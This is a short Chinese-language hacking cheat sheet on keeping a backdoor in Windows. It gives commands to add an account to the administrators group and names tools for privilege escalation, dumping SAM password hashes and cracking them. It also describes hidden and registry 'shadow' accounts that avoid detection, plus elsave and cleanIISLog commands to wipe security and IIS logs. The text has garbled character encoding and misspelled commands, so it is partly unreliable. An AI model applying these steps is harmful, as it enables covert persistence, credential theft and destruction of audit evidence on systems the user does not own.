windows留后門思路及方法

管理用戶命令

net user 查看有哪些用戶
net user administator 顯示用戶信息
net user hacker 123 /add 添加hacker賬號，并設(shè)密碼為123（密碼科省略）
net user hacker abc 將hacker的密碼改為abc
net user hacker /del 刪除hacker用戶
net user hacker /active:no 禁用hacker用戶

管理本地組命令

net localgroup administrators 顯示管理組中所有成員
net localgroup administators hacker /add 將hacker用戶添加到administrators用戶組中
net localgroup administrator hacker /del 將hacker從administrators用戶組中刪除

查看當(dāng)前用戶是誰

windows用 whoami，whoami /all則可以看到sid和rid的值。
kali獲得shell后用getuid

windows提權(quán)工具

Churrasco.exe
pr.exe

windows留后門思路

第一種：
創(chuàng)建一個(gè)賬號（名字取個(gè)便于隱藏的），將其添加到administrators用戶組中，就獲得了最高管理員的權(quán)限。
第二種：
破解原administrator賬號密碼

SAM數(shù)據(jù)庫
c:\windows\system32\config\SAM
win7之前的系統(tǒng)采用LM-HASH加密，win7之后的采用NTLM-HASH加密
獲取hash密碼軟件 QUARKS PwDump;
破解hash密碼 http://www.objectif-securite.ch/en/ophcrack.php

第三種：
建立隱藏賬號
（一）建立簡單隱藏賬號：在用戶名后面加"
注：簡單隱藏賬號在字符界面下net user無法查看，但在圖形界面的"本地用戶和組"中能看到
（二）建立完全隱藏賬號（影子賬號）
通過導(dǎo)入注冊表的方式創(chuàng)建賬號。具體步驟百度。
注：1.這樣創(chuàng)建的用戶，登錄后不會(huì)再C:\Documens and Settings中創(chuàng)建用戶配置文件夾，而留下創(chuàng)建登錄痕跡。2.這種只能查注冊表才能發(fā)現(xiàn)。也可用相應(yīng)的工具，如"本地管理員檢查工具"

清理系統(tǒng)日志

elsave工具 清理日志 elsave.exe -l security -C 清楚所有日志
cleanIISLog 清楚指定ip的日志